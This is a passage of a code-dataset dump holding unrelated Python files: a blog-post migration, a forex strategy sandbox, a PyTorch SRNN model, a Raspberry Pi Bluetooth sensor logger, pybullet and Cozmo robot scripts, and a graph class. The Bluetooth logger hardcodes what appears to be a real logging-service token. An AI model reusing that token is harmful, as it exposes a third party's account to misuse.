without installed js/node programms.\\n'\n '- **Dockerfile**, **docker-compose.yml**, **entrypoint.sh**, **Makefile**, **wait-for-it.sh** used for deploying using docker containers.\\n'\n '- **requirements.txt** - contains list of used python packets. Similar for fronted can be found in **/ui/package.json**.\\n',\n 'user_id': 1\n },\n {\n 'id': 8,\n 'title': 'to-do',\n 'body': '## to-do\\n\\n'\n '* add email validation on registration process.\\n'\n '* add `GraphQL` or `Swagger` to simplify syncronization between backend and frontend during API development. \\n'\n '* add `react native` template to this project that uses same source base with existing reactJS project and'\n 'compatible with existing backend and database schema as starting point on mobile application development.\\n',\n 'user_id': 1\n },\n {\n 'id': 9,\n 'title': 'user manual',\n 'body': '## user manual\\n\\n* login as `guest/guest1` at [flask-reactjs-template](https://flask-reactjs-template.m2m-tele.com/)\\n * run `docker-compose up` from root folder of project and access `http://localhost:8887/` using browser. '\n 'Use `guest/guest1` credentials to login.\\n'\n '* to run without docker: `make ui-install && make ui-build && flask run`. But you must setup correct environment variables '\n 'shown in `database.conf` file to access your local **postgresql** database.\\n',\n 'user_id': 1\n },\n {\n 'id': 10,\n 'title': 'security',\n 'body': '## security\\n\\nDont place `database.conf` file under git version control. Find another way to deliver environment variables to ' \n '`production` and `development` machines.\\n',\n 'user_id': 1\n },\n ])\n\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_table('post')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/a5b9000f295e_posts_table.py","file_name":"a5b9000f295e_posts_table.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"233379568","text":"from __future__ import division\nimport json, time, datetime\n\nclass order:\n \"\"\"\n Class object for order data\n \"\"\"\n def __init__(self, instrument, units, side, trade_type, expiry, price):\n # Order instrument (currency pair, str, \"EUR_USD\")\n self.instrument = instrument\n # Order units (number of units of instrument) ($ investment / price)\n self.units = units\n # Order side (buy/sell, str)\n self.side = side\n # Type: limit, stop, marketIfTouched, market\n self.type = trade_type\n # Expiry: order expiration date (valid datetime format)\n self.expiry = expiry\n # Price to execute order\n self.price = price\n\n def printOrder(self):\n \"\"\"\n Display Order Data\n \"\"\"\n pass\n\n\nclass tradingStrategy:\n \"\"\"\n Class object for trading strategy data (initializing data, history, trade, etc)\n \"\"\"\n def __init__(self, name, initial_price, closing_price, initial_investment, heartbeat, instrument, side):\n self.name = name\n self.initial_price = initial_price\n self.closing_price = closing_price\n self.initial_investment = initial_investment\n self.heartbeat = heartbeat\n self.instrument = instrument\n self.side = side\n\n self.price_step = self.calculate_price_step()\n self.investment_per_trade = self.calculate_investment_amount()\n\n self.print_trading_strategy(initial=True)\n\n self.orders = []\n\n def calculate_price_step(self):\n \"\"\"\n Calculate Price Step: N = (closing_price - initial_price) / heartbeat\n\n See README #6\n \"\"\"\n return (self.closing_price - self.initial_price) / self.heartbeat\n\n def calculate_investment_amount(self):\n \"\"\"\n Calculate Investment Amount: I = (total investment) / heartbeat\n\n See README #7\n \"\"\"\n return self.initial_investment / self.heartbeat\n\n def print_trading_strategy(self, initial=False):\n \"\"\"\n Print Trading Strategy\n \"\"\"\n message = \"\\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* TRADING STRATEGY INITIALIZED: \\n\" \\\n \"* Name: %s \\n\" \\\n \"* Instrument: %s \\n\" \\\n \"* Side: %s \\n\" \\\n \"* Investment Amount: %0.2f \\n\" \\\n \"* Initial Price: %0.4f \\n\" \\\n \"* Closing Price: %0.4f \\n\" \\\n \"* Heartbeat: %d \\n\" \\\n \"* Price Step: %0.4f \\n\" \\\n \"* Investment Per Trade: %0.2f \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"*************** WATCHING THE PRICE ******************\\n\" \\\n \"--------------------------------------------------------\\n\" % (self.name, self.instrument, self.side, self.initial_investment, self.initial_price, \n self.closing_price, self.heartbeat, self.price_step, self.investment_per_trade)\n print(message)\n\n\ndef get_market_price(trading_strategy, debug, prices, step):\n \"\"\"\n Get Current Market Price of Instrument for Trading Strategy\n\n If DEBUG = TRUE: get price from test file\n If DEBUG = FALSE: poll OANDA for current price\n \"\"\"\n if debug:\n return datetime.datetime.strptime(prices[step][\"data\"][\"date\"], \"%Y-%m-%d\"), prices[step][\"data\"][\"price\"]\n else:\n return getOandaPrice(trading_strategy)\n\n\ndef handleWait(trading_strategy, date, price):\n \"\"\"\n Waiting until price goes to initial price\n \"\"\"\n message = \"\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* PRICE CHECKED: %s \\n\" \\\n \"* RESULT: Waiting...price has not reached threshold \\n\" \\\n \"* Trading Strategy Initial Price: %0.4f \\n\" \\\n \"* Current Price: %0.4f \\n\" \\\n \"* Timestamp: %s \\n\" \\\n \"* CHECKING AGAIN SOON.... \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"*************** WATCHING THE PRICE ******************\\n\" \\\n \"--------------------------------------------------------\\n\" % (trading_strategy.name, trading_strategy.initial_price, price, date)\n print(message)\n\ndef handleBeginning(trading_strategy, date, price):\n \"\"\"\n Enter into alive state\n \"\"\"\n message = \"\" \\\n \"--------------------------------------------------------\\n\" \\\n \"* PRICE CHECKED: %s \\n\" \\\n \"* RESULT: Trading strategy is now live, buying in \\n\" \\\n \"* Trading Strategy Initial Price: %0.4f \\n\" \\\n \"* Current Price: %0.4f \\n\" \\\n \"* Timestamp: %s \\n\" \\\n \"--------------------------------------------------------\\n\" \\\n \"************** MAKING INITIAL ORDER *****************\\n\" \\\n \"--------------------------------------------------------\\n\" % (trading_strategy.name, trading_strategy.initial_price, price, date)\n print(message)\n\n\ndef begin_trading_strategy(my_trading_strategy, debug=True, price_history=None, step=None):\n \"\"\"\n Main Handler for LIVE Trading Strategy:\n \"\"\"\n print(\"make initial order\")\n\n level = 1\n while True:\n date, price = get_market_price(my_trading_strategy, debug, price_history, step)\n\n price_low = my_trading_strategy.initial_price\n price_threshold = my_trading_strategy.initial_price + my_trading_strategy.price_step * level\n\n while True:\n print(\"------waiting------\")\n print(\"LOW: %0.4f\" % price_low)\n print(\"HIGH: %0.4f\" % price_threshold)\n\n step+=1\n\ndef initializeStrategy(name, initial_price, closing_price, initial_investment, heartbeat, instrument, side, debug=True, prices=None):\n \"\"\"\n Begin trading strategy, start watching the price, initialize when P <= initial price. \n \"\"\"\n # INITIALIZE TRADING STRATEGY\n my_trading_strategy = tradingStrategy(name, initial_price, closing_price, initial_investment, heartbeat, instrument, side)\n\n price_history = None\n if debug and prices:\n price_file = open(prices, \"r\")\n price_history = json.load(price_file)\n price_history = price_history[::-1]\n\n # ENTER INTO TRADING STRATEGY\n step = 0\n while True:\n date, current_price = get_market_price(my_trading_strategy, debug, price_history, step)\n\n if (current_price <= my_trading_strategy.initial_price):\n # Display Message, Trading Strategy is Now Live\n handleBeginning(my_trading_strategy, date, current_price)\n # Enter into live state\n break\n else:\n # Display Waiting Message, Trading Strategy is not live\n handleWait(my_trading_strategy, date, current_price)\n\n # Wait half a second (this is debug mode)\n step+=1\n time.sleep(0.5)\n\n begin_trading_strategy(my_trading_strategy, debug, price_history, step)\n\ndef main():\n \"\"\"\n Main: Sandbox testing of trading strategy. See README for details.\n \"\"\"\n # Trading strategy name (identifier)\n name = \"Hill's Test Trading Strategy\"\n\n # Price at which to begin trading strategy (See #1 in README)\n initiating_price = 0.7272\n\n # Price at which to close trading strategy (See #2 in README)\n closing_price = 0.9000\n\n # Total investment in strategy (See #3 in README)\n initial_investment = 100000\n\n # Trading strategy heartbeat/increment/step (See #4 in README)\n heartbeat = 50\n\n # Instrument of the trading strategy\n instrument = \"USD_EUR\"\n\n # Side of the trade the trading strategy is on\n side = \"buy\"\n\n # Testing (See #5 in README)\n strategy_debug = True\n\n # If testing, file of historical prices\n test_prices = \"synthetic_prices/USD_EUR_TEST.json\"\n\n # Initialize trading strategy\n initializeStrategy(name, initiating_price, closing_price, initial_investment, heartbeat, instrument, side, debug=strategy_debug, prices=test_prices)\n\nif __name__ == \"__main__\":\n main()","sub_path":"sandbox/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":8951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"30065744","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom models.output_layer import *\nfrom models.utils import *\nfrom models import base\n\n\nclass Model(base.SRNNBase):\n def __init__(self, d_data, d_emb, d_mlp, d_rnn, d_lat, n_layer, dropout=0.,\n **kwargs):\n super(Model, self).__init__(d_data, d_emb, d_mlp, d_rnn, d_lat, n_layer,\n dropout)\n\n ##### low-level modules\n self.inp_emb_low = nn.Sequential(\n nn.Linear(1, d_emb),\n nn.Dropout(dropout)\n )\n\n self.n_low_layer = kwargs.get('n_low_layer', 1)\n self.rnn_low = nn.LSTM(d_rnn + d_emb, d_rnn, dropout=dropout)\n for i in range(self.n_low_layer):\n params = 'self.rnn_low.weight_hh_l{}'.format(i)\n nn.init.orthogonal_(eval(params).data)\n\n self.init_h = nn.Parameter(\n torch.Tensor(self.n_low_layer, self.d_rnn).uniform_(-0.01, 0.01))\n self.init_c = nn.Parameter(\n torch.Tensor(self.n_low_layer, self.d_rnn).uniform_(-0.01, 0.01))\n\n ##### output modules\n crit_d_tgt = self.d_data\n crit_inp_shape = (d_data, self.d_rnn)\n self.crit = GMCriterion(1, crit_d_tgt, crit_inp_shape)\n\n\n def _init_hid_low(self, bsz):\n h = self.init_h[:,None,:].expand(-1, bsz, -1).contiguous()\n c = self.init_c[:,None,:].expand(-1, bsz, -1).contiguous()\n return (h, c)\n\n\n def forward(self, x, y, hidden=None, mask=None):\n qlen, bsz, _ = x.size()\n\n ##### high-level computation\n z, output, mu_prior, logvar_prior, mu_post, theta_post = \\\n self.srnn_forward(x, y)\n\n\n ##### low-level computation\n x_low = y.permute(2, 0, 1).contiguous()\n x_low = x_low.view(self.d_data, qlen * bsz, 1)\n\n # input to the low-level rnn\n x_low_emb = self.inp_emb_low(x_low)\n extra_inp = output.view(1, qlen * bsz, self.d_rnn) \\\n .expand(self.d_data, -1, -1)\n extra_inp = self.drop(extra_inp)\n inp_low = torch.cat([x_low_emb, extra_inp], -1)\n\n # initial state for the low-level\n hid_low = self._init_hid_low(qlen * bsz)\n\n # low-level rnn forward\n out_low, _ = self.rnn_low(inp_low, hid_low)\n\n # out_low: [d_data x (qlen*bsz) x d_rnn]\n out_low = torch.cat([hid_low[0], out_low[:-1]], 0)\n out_low = self.drop(out_low)\n\n # out_low: [qlen x bsz x d_data x d_rnn]\n out_low = out_low.view(self.d_data, qlen, bsz, self.d_rnn) \\\n .permute(1, 2, 0, 3).contiguous()\n\n ##### loss\n # NLL\n nll = self.crit(out_low, y)\n nll = nll.sum(-1)\n if mask is not None:\n nll = nll * mask\n\n # KL(q||p)\n kld = gaussian_kld([mu_post, theta_post], [mu_prior, logvar_prior])\n kld = kld.sum(-1)\n if mask is not None:\n kld = kld * mask\n\n return nll, -kld, None\n\n","sub_path":"speech/models/srnn_hier_inp.py","file_name":"srnn_hier_inp.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"96503560","text":"import json\n\n\nclass Response:\n def __init__(self, code, body=None, headers=None):\n self.code = code\n self.body = body\n self.headers = None\n\n def format(self):\n \"\"\"\n Format the Response instance to the\n expected Lambda response format.\n \"\"\"\n response = {\n \"statusCode\": self.code\n }\n\n if self.body is not None:\n response[\"body\"] = json.dumps(self.body)\n\n if self.headers is not None:\n response[\"headers\"] = self.headers\n\n return response\n","sub_path":"pylambdarest/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45557520","text":"#The code from https://people.csail.mit.edu/albert/bluez-intro/x232.html was used to connect to the server and transfer data. \n#r7insight downloaded from https://pypi.org/project/r7insight_python/\nimport bluetooth\nfrom r7insight import R7InsightHandler\nimport logging\nimport time\nimport Adafruit_DHT\nimport datetime \n\n\nsensor = 11\npin = 23\n\nserver_sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n\nport = 1\nserver_sock.bind((\"\",port))\nserver_sock.listen(1)\n\nlog = logging.getLogger('r7insight')\nlog.setLevel(logging.INFO)\n\n#Insightops Log Token\ntest = R7InsightHandler('24568bbf-d50f-4922-b2fc-aede9a941f98', 'eu')\n\n\nlog.addHandler(test)\n\nclient_sock,address = server_sock.accept()\nprint(\"Accepted connection from \",address)\n\nwhile True:\n \n #Record After every 5 sec\n data = client_sock.recv(1024)\n print(\"received [%s]\" % data)\n \n #Reading Data from RPi 1 Sensor\n log.info(data)\n \n #Reading Data from RPi 2 Sensor(Server)\n ts = str(datetime.datetime.now())\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n \n log.info(ts + \" SensorID = Sam\" + \" Temperature = {}, Humidity= {} \".format(temperature,humidity))\n#client_sock.close()\n\n\n\n\n","sub_path":"bluetooth_serverPi.py","file_name":"bluetooth_serverPi.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510273360","text":"import pybullet as p\nimport time\nimport pybullet_data\nfrom termcolor import colored\nimport os\nfrom ipdb import set_trace as tt\ndef printGreen(string):\n \"\"\"\n Print a string in green in the terminal\n :param string: (str)\n \"\"\"\n print(colored(string, 'green'))\n\n\ndef printYellow(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'yellow'))\n\n\ndef printRed(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'red'))\n\n\ndef printBlue(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'blue'))\n\n\n_urdf_path = pybullet_data.getDataPath()\ncustom_urdf_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/urdf\"\nsjtu_urdf_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/urdf_robot\"\npybullet_data_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/pybullet_data\"\n# physicsClient = p.connect(p.DIRECT)#or p.DIRECT for non-graphical version\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally\n\n#p.setAdditionalSearchPath('urdf') #optionally\np.setGravity(0,0,0.0)\np.computeViewMatrix(cameraEyePosition=[0.5,0.5,0.5], cameraTargetPosition=[0,0,0], cameraUpVector=[0,0,0])\n\nplaneId = p.loadURDF(os.path.join(_urdf_path, \"plane.urdf\"))\n\ncubeStartPos = [0,0,1]\ncubeStartOrientation = p.getQuaternionFromEuler([0,0,0])\n#r2d2Id = p.loadURDF(os.path.join(_urdf_path, \"r2d2.urdf\"), cubeStartPos, cubeStartOrientation)\n# gripperId = p.loadURDF(os.path.join(pybullet_data_path, \"gripper/wsg50_one_motor_gripper_left_finger.urdf\"), [0,0,0])\n# huskyId = p.loadURDF(os.path.join(pybullet_data_path, \"husky/husky.urdf\"), [0,0,0])\n# jengaId = p.loadURDF(os.path.join(pybullet_data_path, \"jenga/jenga.urdf\"), [0,0,0])\n# kuka = p.loadURDF(os.path.join(pybullet_data_path, \"kuka_iiwa/model_vr_limits.urdf\"), [0,0,0])\n# lego = p.loadURDF(os.path.join(pybullet_data_path, \"lego/lego.urdf\"), [0,0,0])\n# quadruped1 = p.loadURDF(os.path.join(pybullet_data_path, \"quadruped/minitaur.urdf\"), [0,0,0])\n# quadruped = p.loadURDF(os.path.join(pybullet_data_path, \"quadruped/minitaur_fixed_all.urdf\"), [0,0,0])\n# racer = p.loadURDF(os.path.join(pybullet_data_path, \"racecar/racecar.urdf\"), [0,0,0])\n# table = p.loadURDF(os.path.join(pybullet_data_path, \"table_square/table_squre.urdf\"), [0,0,0])\n# tray = p.loadURDF(os.path.join(pybullet_data_path, \"tray/tray_textured2.urdf\"), [0,0,0])\n# object = p.loadURDF(os.path.join(pybullet_data_path, \"teddy_vhacd.urdf\"), [0,0,0])\n# object2 = p.loadSDF(os.path.join(pybullet_data_path, \"stadium.sdf\"))\n# objects = p.loadSDF(os.path.join(_urdf_path, \"kuka_iiwa/kuka_with_gripper2.sdf\"))\n# sjtuID = p.loadURDF(os.path.join(sjtu_urdf_path,\"inmoov_right_hand.urdf\"), [1,1,1] )\n# another = p.loadSDF(os.path.join(sjtu_urdf_path, \"tomato/newsdf.sdf\"))\n\nanother = p.loadURDF(os.path.join(sjtu_urdf_path, \"tomato_plant.urdf\"))\nsjtuID = p.loadURDF(os.path.join(sjtu_urdf_path,\"inmoov_col.urdf\"), [1,1,0] )\n# modelId = p.loadURDF(os.path.join(pybullet_data_path, \"kuka_iiwa/model_free_base.urdf\"),[1,1,1])\n\nfor i in range (1000000):\n # time.sleep(0.05)\n p.stepSimulation()\ntime.sleep(1.)\n# cubePos, cubeOrn = p.getBasePositionAndOrientation(boxId)\n#printRed(\"{} {}\".format(cubePos,cubeOrn))\np.disconnect()\n","sub_path":"environments/sjtubot_gym/bulletlearn.py","file_name":"bulletlearn.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133274599","text":"#n=int(input())\nn,x,y=map(int,input().split())\n#l=list(map(int,input().split()))\n#l=[list(map(int,input().split())) for i in range(n)]\n\n#adjl=[[0 for i in range(n)] for j in range(n)]\n\ndic={}\n\nfor i in range(n):\n for j in range(i,n):\n #if i>=j:\n # continue\n dis=j-i\n maybe=abs(x-(i+1))+1+abs(y-(j+1))\n dis=min(dis,maybe)\n #adjl[i][j]=dis\n dic[dis]=dic.get(dis,0)+1\n\"\"\"\nfor i in range(n):\n for j in range(i,n):\n #if i>=j:\n # continue\n dis=adjl[i][j]\n dic[dis]=dic.get(dis,0)+1\n\"\"\"\nfor k in range(1,n):\n print(dic.get(k,0))\n ","sub_path":"ABC160/ABC160_D.py","file_name":"ABC160_D.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"546640567","text":"class Graph:\n \"\"\"\n vertices: list\n A list of str representing the vertices\n adj_list: dict\n A dict mapping vertices (str) to list of str representing the neighbors (adjacency list)\n \"\"\"\n def __init__(self, vertices: list, adj_list: dict):\n self.vertices = vertices\n self.adj_list = adj_list\n\n def __str__(self):\n graphstr = \"\"\n for (i, vertex) in enumerate(self.vertices):\n graphstr += vertex + \":\"\n for (j, neighbor) in enumerate(self.adj_list[vertex]):\n graphstr += neighbor\n if j != len(self.adj_list[vertex]) - 1:\n graphstr += \",\" # there are still more neighbors to print\n graphstr += \";\" # finished printing current vertex\n if i != len(self.vertices) - 1:\n graphstr += \" \" # there are still more vertices to print\n graphstr += \";\" # finished printing the graph\n return graphstr\n\n def get_degree(self, vertex: str) -> int:\n return len(self.adj_list[vertex])\n\n def get_number_of_vertices(self) -> int:\n return len(self.vertices)\n\n # If you have an undirected graph, divide this value by 2\n def get_number_of_edges(self) -> int:\n num_edges = 0\n for v in self.vertices:\n num_edges += self.get_degree(v)\n return num_edges\n\n def get_neighbors(self, vertex: str) -> list:\n return self.adj_list[vertex]\n\n def is_adjacent(self, vertex_a: str, vertex_b: str) -> bool:\n return vertex_b in self.adj_list[vertex_a]\n\n def remove_vertex(self, vertex: str):\n for neighbor in self.adj_list[vertex]:\n self.adj_list[neighbor].remove(vertex)\n del self.adj_list[vertex]\n self.vertices.remove(vertex)\n\ndef get_graph_from_str(graphstr: str) -> Graph:\n vertices = []\n adj_list = dict()\n\n # GRAPH STRING PARSER (FINITE STATE MACHINE)\n # 0: initial, 1: adding new vertex, 2: adding new neighbor\n parser_state = 0\n # auxiliary variables\n vertex_name = \"\"\n neighbor_name = \"\"\n for c in graphstr:\n if c == \" \": # skip spaces\n continue\n\n if parser_state == 0:\n current_vertex = \"\"\n if c.isalnum():\n vertex_name += c\n parser_state = 1\n elif c == \";\":\n # success\n pass\n elif parser_state == 1:\n if c.isalnum():\n vertex_name += c\n elif c == \":\":\n current_vertex = vertex_name\n vertices.append(current_vertex)\n adj_list[current_vertex] = []\n vertex_name = \"\"\n parser_state = 2\n elif parser_state == 2:\n if c.isalnum():\n neighbor_name += c\n elif c == \",\":\n adj_list[current_vertex].append(neighbor_name)\n neighbor_name = \"\"\n elif c == \";\":\n if neighbor_name != \"\":\n adj_list[current_vertex].append(neighbor_name)\n neighbor_name = \"\"\n parser_state = 0\n\n return Graph(vertices, adj_list)\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"102042240","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2018, Team skynet.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License in the file LICENSE.txt or at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n'''Make Cozmo do a little slalom race:\n start/finish line\n\t|\ncozmo---- 30 cm ---- cube_1 ---- 30 cm ---- cube_2 ---- 30 cm ---- cube_3\n\t|\nCozmo has to pick up cube_3 after encircling it and place it on cube_1\nFinally, cozmo has to cross the start/finish line\n'''\n\nimport asyncio\n\nimport cozmo\nfrom cozmo.util import degrees, distance_mm, speed_mmps, Pose\n\ndef cozmo_search_cube (robot: cozmo.robot.Robot):\n look_around = robot.start_behavior(cozmo.behavior.BehaviorTypes.LookAroundInPlace)\n\n # try to find a block\n cube = None\n\n try:\n cube = robot.world.wait_for_observed_light_cube(timeout=10)\n\n except asyncio.TimeoutError:\n print(\"Didn't find a cube :-(\")\n\n finally:\n # whether we find it or not, we want to stop the behavior\n look_around.stop()\n return cube\n\n\n\ndef cozmo_program(robot: cozmo.robot.Robot):\n \n robot.drive_wheels(110, 220, 0, 0, 0.7)\n robot.drive_wheels(220, 110, 0, 0, 0.7)\n robot.drive_wheels(220, 220, 0, 0, 0.55)\n robot.drive_wheels(220, 110, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .2)\n robot.drive_wheels(110, 220, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .2)\n robot.drive_wheels(110, 220, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .4)\n robot.drive_wheels(220, 40, 0, 0, .2)\n robot.drive_wheels(220, 115, 0, 0, 2.5)\n robot.drive_wheels(220, 85, 0, 0, 1.9)\n robot.drive_wheels(220, -220, 0, 0, .25)\n\n cube = cozmo_search_cube(robot)\n while cube == None :\n cube = cozmo_search_cube(robot)\n action = robot.pickup_object(cube, True, True, 3)\n result = action.wait_for_completed(timeout=30)\n \n robot.drive_wheels(220, -220, 0, 0, .2)\n robot.drive_wheels(-220, -220, 0, 0, .5)\n robot.go_to_pose(Pose(310, 2, 0, angle_z=degrees(-90)), relative_to_robot=False).wait_for_completed()\n\n\n cube2 = cozmo_search_cube(robot)\n while cube2 == None :\n cube2 = cozmo_search_cube(robot)\n \n # Now try to place that cube on the 2nd one\n current_action = robot.place_on_object(cube2, num_retries=3)\n current_action.wait_for_completed()\n if current_action.has_failed:\n code, reason = current_action.failure_reason\n result = current_action.result\n print(\"Place On Cube failed: code=%s reason='%s' result=%s\" % (code, reason, result))\n\n robot.go_to_pose(Pose(-300, 0, 0, angle_z=degrees(-90)), relative_to_robot=False).wait_for_completed()\n\n\ncozmo.run_program(cozmo_program)\n","sub_path":"sprint2/slalom/slalom.py","file_name":"slalom.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"624811577","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.8'\n\nsetup(name='SaladeDeFruits',\n version=version,\n description=\"A skinning middleware\",\n long_description=open('README.txt').read(),\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware',\n 'Operating System :: OS Independent',\n ],\n keywords='wsgi middleware skin lxml pyquery',\n author='Gael Pasgrimaud',\n author_email='gael@gawel.org',\n url='http://www.gawel.org/docs/SaladeDeFruits/index.html',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'WebOb',\n 'Paste',\n 'restkit',\n 'pyquery',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [paste.filter_app_factory]\n main = saladedefruits.saladier:make_salade\n [paste.app_factory]\n rewrite = saladedefruits.rewrite:make_rewrite\n \"\"\",\n )\n","sub_path":"pypi_install_script/SaladeDeFruits-0.8.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133843895","text":"# Andrew Bogdan\n# app.py\n\"\"\"\n\tThe thing that interacts with the OS and what's imported by __main__ through __init__.\n\"\"\"\n\n# Imports\nimport copy\nimport curses\nimport json\nimport os\nimport traceback\n\nfrom mirec_miskuf_json import json_loads_str\n\nfrom renderer import Renderer\nfrom game import Game\n\n# Classes\nclass App(object):\n\t\"\"\"\n\tThe all-encompassing class which connects the computer, game, and the renderer\n\n\tApp.__init__(self)\n\tApp._loop(self)\n\tApp._quit(self)\n\tApp.stop(self)\n\tApp.start(self)\n\n\tApp._game\n\tApp._is_running\n\tApp._options\n\tApp._renderer\n\tApp._screen\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\"Intialize App, starting the game.\"\"\"\n\n\t\t# Load game options\n\t\tgame_options_path = os.path.join(\tos.path.dirname(__file__), \n\t\t\t\t\t\t\t\t\t\t\t\"options.json\")\n\t\tgame_options_file = open(game_options_path, 'r')\n\t\tself._options = json_loads_str(game_options_file.read())\n\t\tgame_options_file.close()\n\n\t\t# Load renderer options\n\t\trenderer_options_path = os.path.join(\tos.path.dirname(__file__),\n\t\t\t\t\t\t\t\t\t\t\t\t\"renderer\",\n\t\t\t\t\t\t\t\t\t\t\t\t\"options.json\")\n\t\trenderer_options_file = open(renderer_options_path, 'r')\n\t\trenderer_options = json_loads_str(renderer_options_file.read())\n\t\trenderer_options_file.close()\n\n\t\t# Initialize variables\n\t\tself._is_running = False;\n\n\t\tself._game = Game(self, self._options)\n\t\tself._renderer = Renderer(self, renderer_options)\n\n\t\t# Start curses for I/O\n\t\tself._screen = curses.initscr()\n\n\t\tcurses.noecho()\n\t\tcurses.cbreak()\n\t\tcurses.curs_set(0)\n\t\tself._screen.nodelay(1)\n\t\tself._screen.keypad(1)\n\n\tdef _loop(self):\n\t\t\"\"\"Perform a main game loop.\"\"\"\n\n\t\t# Loop the subclasses\n\t\tself._game.loop()\n\t\tself._renderer.loop()\n\n\t\t# Get and evaluate I/O\n\t\tkey = self._screen.getch()\n\n\t\t# Evaluate text input\n\t\tif key != curses.ERR:\n\t\t\ttry:\n\n\t\t\t\tself._game.eval_echo(chr(key))\n\n\t\t\texcept ValueError:\n\n\t\t\t\tpass\n\n\t\t# Evaluate the first key binding which does something\n\t\tif str(key) in self._options[\"controls\"] and key != curses.ERR:\n\t\t\tfor control_string in self._options[\"controls\"][str(key)]:\n\t\t\t\t# This if clause executes the action and returns a boolean if it did anything\n\t\t\t\tif self._game.eval_control_string(control_string):\n\n\t\t\t\t\tbreak\n\n\tdef _quit(self):\n\t\t\"\"\"Clean up and shut down the app.\"\"\"\n\n\t\t# Shut down curses\n\t\tself._screen.keypad(0)\n\t\tself._screen.nodelay(0)\n\t\tcurses.curs_set(1)\n\t\tcurses.nocbreak()\n\t\tcurses.echo()\n\t\tcurses.endwin()\n\n\tdef stop(self):\n\t\t\"\"\"Stop looping.\"\"\"\n\n\t\tself._is_running = False\n\n\tdef start(self):\n\t\t\"\"\"Start looping; this is called independently and is the last thing to run.\"\"\"\n\n\t\t# Loop\n\t\tself._is_running = True\n\n\t\twhile self._is_running:\n\t\t\ttry:\n\n\t\t\t\tself._loop()\n\n\t\t\texcept:\n\n\t\t\t\tself._quit()\n\t\t\t\ttraceback.print_exc()\n\t\t\t\treturn\n\n\t\t# Quit when the loop stops\n\t\tself._quit()","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"584129374","text":"from flask import Flask\nfrom flask import render_template\nfrom mongokit import Connection, Document\nimport random, time\nfrom dateutil.relativedelta import relativedelta\n\n# attrs = ['years', 'months', 'days', 'hours', 'minutes', 'seconds']\n# human_readable = lambda delta: ['%d %s' % (getattr(delta, attr), getattr(delta, attr) > 1 and attr or attr[:-1]) \n# for attr in attrs if getattr(delta, attr)]\n\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\nMAX_LEADERS = 5\n\ngrumpy = [ 107867, 242468, 365880, 559237, 678106, 766439, 876973,\n 111316, 262374, 413459, 560260, 680595, 769432, 887917,\n 111349, 266346, 428552, 560412, 680802, 791768, 892302,\n 117285, 277852, 430899, 567038, 686248, 794427, 902504,\n 120069, 284509, 450628, 567934, 694734, 795988, 915628,\n 155707, 288847, 466353, 